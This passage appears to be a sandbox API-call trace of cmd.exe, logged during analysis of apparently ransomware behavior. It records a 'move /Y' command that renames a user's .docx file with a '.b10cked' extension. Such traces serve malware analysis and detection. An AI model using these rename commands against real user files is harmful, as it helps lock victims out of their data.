returned 0x38 [0135.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.532] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0135.532] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fe6c | out: phkResult=0x20fe6c*=0x0) returned 0x2 [0135.533] VirtualQuery (in: lpAddress=0x20fea3, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.533] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.533] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.533] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.533] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.533] GetConsoleOutputCP () returned 0x1b5 [0135.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.533] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0135.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0135.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0135.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.533] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0135.534] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.534] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0135.534] GetEnvironmentStringsW () returned 0x340178* [0135.534] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0135.534] GetEnvironmentStringsW () returned 0x340178* [0135.534] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0135.534] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eddc | out: phkResult=0x20eddc*=0x40) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0xa0, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x1, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x1, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x0, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x40, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x40, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x40, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.535] RegCloseKey (hKey=0x40) returned 0x0 [0135.535] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eddc | out: phkResult=0x20eddc*=0x40) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x40, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x1, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x1, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x0, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x9, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x9, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x9, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.535] RegCloseKey (hKey=0x40) returned 0x0 [0135.535] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0135.535] srand (_Seed=0x5b88636a) [0135.535] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"" [0135.535] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"" [0135.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.535] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0135.536] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.536] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.536] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.536] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.536] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.536] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.536] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.536] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.536] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.536] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.536] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.536] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.536] GetEnvironmentStringsW () returned 0x3422c8* [0135.536] FreeEnvironmentStringsW (penv=0x3422c8) returned 1 [0135.536] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.536] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.536] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.536] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.536] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.536] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.536] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.536] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.536] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.536] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.536] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fba8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.537] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fba8, lpFilePart=0x20fba4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fba4*="Desktop") returned 0x18 [0135.537] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.537] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f924 | out: lpFindFileData=0x20f924) returned 0x340008 [0135.537] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0135.537] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f924 | out: lpFindFileData=0x20f924) returned 0x340008 [0135.537] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0135.537] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f924 | out: lpFindFileData=0x20f924) returned 0x340008 [0135.537] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0135.537] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.537] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0135.538] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0135.538] GetEnvironmentStringsW () returned 0x342ae8* [0135.538] FreeEnvironmentStringsW (penv=0x342ae8) returned 1 [0135.538] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.538] GetConsoleOutputCP () returned 0x1b5 [0135.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.538] GetUserDefaultLCID () returned 0x409 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fce8, cchData=128 | out: lpLCData="0") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fce8, cchData=128 | out: lpLCData="0") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fce8, cchData=128 | out: lpLCData="1") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0135.540] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0135.540] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0135.540] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.541] GetConsoleTitleW (in: lpConsoleTitle=0x3308d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.541] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0135.541] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0135.541] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0135.542] _wcsicmp (_String1="move", _String2=")") returned 68 [0135.542] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0135.542] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0135.542] _wcsicmp (_String1="IF", _String2="move") returned -4 [0135.542] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0135.542] _wcsicmp (_String1="REM", _String2="move") returned 5 [0135.542] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0135.545] GetConsoleTitleW (in: lpConsoleTitle=0x20f9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.579] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0135.579] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0135.579] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0135.579] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0135.579] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="CD") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0135.579] _wcsicmp (_String1="move", _String2="REN") returned -5 [0135.579] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0135.579] _wcsicmp (_String1="move", _String2="SET") returned -6 [0135.579] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0135.579] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0135.579] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0135.579] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0135.579] _wcsicmp (_String1="move", _String2="MD") returned 11 [0135.579] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0135.579] _wcsicmp (_String1="move", _String2="RD") returned -5 [0135.579] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0135.579] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0135.579] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0135.579] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0135.579] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0135.579] _wcsicmp (_String1="move", _String2="VER") returned -9 [0135.579] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0135.579] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0135.579] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0135.579] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0135.579] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0135.579] _wcsicmp (_String1="move", _String2="START") returned -6 [0135.579] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0135.579] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0135.579] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0135.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.581] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f79c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f794, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f794*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.582] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0135.583] _wcsicmp (_String1="-V83XF~1.DOC", _String2=".") returned -1 [0135.583] _wcsicmp (_String1="-V83XF~1.DOC", _String2="..") returned -1 [0135.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xf~1.doc")) returned 0x20 [0135.583] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.583] SetErrorMode (uMode=0x0) returned 0x0 [0135.583] SetErrorMode (uMode=0x1) returned 0x0 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", nBufferLength=0x104, lpBuffer=0x20f124, lpFilePart=0x20f10c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", lpFilePart=0x20f10c*="-V83XF~1.DOC") returned 0x26 [0135.583] SetErrorMode (uMode=0x0) returned 0x1 [0135.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0135.583] _wcsicmp (_String1="-V83XF~1.DOC", _String2=".") returned -1 [0135.583] _wcsicmp (_String1="-V83XF~1.DOC", _String2="..") returned -1 [0135.583] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xf~1.doc")) returned 0x20 [0135.583] SetErrorMode (uMode=0x0) returned 0x0 [0135.583] SetErrorMode (uMode=0x1) returned 0x0 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", nBufferLength=0x104, lpBuffer=0x20f5a0, lpFilePart=0x20f338 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", lpFilePart=0x20f338*="-V83XF~1.DOC") returned 0x26 [0135.583] SetErrorMode (uMode=0x0) returned 0x1 [0135.584] SetErrorMode (uMode=0x0) returned 0x0 [0135.584] SetErrorMode (uMode=0x1) returned 0x0 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked", nBufferLength=0x104, lpBuffer=0x20f7a8, lpFilePart=0x20f338 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked", lpFilePart=0x20f338*="-V83XFbt5-FsW.docx.b10cked") returned 0x34 [0135.584] SetErrorMode (uMode=0x0) returned 0x1 [0135.584] SetLastError (dwErrCode=0x0) [0135.584] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xfbt5-fsw.docx.b10cked")) returned 0xffffffff [0135.584] GetLastError () returned 0x2 [0135.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x20ecb4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ecb4) returned 0x330f20 [0135.584] FindNextFileW (in: hFindFile=0x330f20, lpFindFileData=0x20ecb4 | out: lpFindFileData=0x20ecb4) returned 0 [0135.584] GetLastError () returned 0x12 [0135.584] FindClose (in: hFindFile=0x330f20 | out: hFindFile=0x330f20) returned 1 [0135.585] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x341af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341af0) returned 0x330f20 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked", nBufferLength=0x104, lpBuffer=0x20ef4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked", lpFilePart=0x0) returned 0x34 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx", nBufferLength=0x104, lpBuffer=0x20ef4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx", lpFilePart=0x0) returned 0x2c [0135.585] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xfbt5-fsw.docx")) returned 0x20 [0135.585] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xfbt5-fsw.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\-v83xfbt5-fsw.docx.b10cked"), dwFlags=0x3) returned 1 [0135.798] FindClose (in: hFindFile=0x330f20 | out: hFindFile=0x330f20) returned 1 [0135.798] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ef00 | out: _Buffer=" 1") returned 9 [0135.798] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.798] GetFileType (hFile=0x7) returned 0x2 [0135.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0135.799] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ee8c | out: lpMode=0x20ee8c) returned 1 [0135.799] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.799] GetConsoleScreenBufferInfo 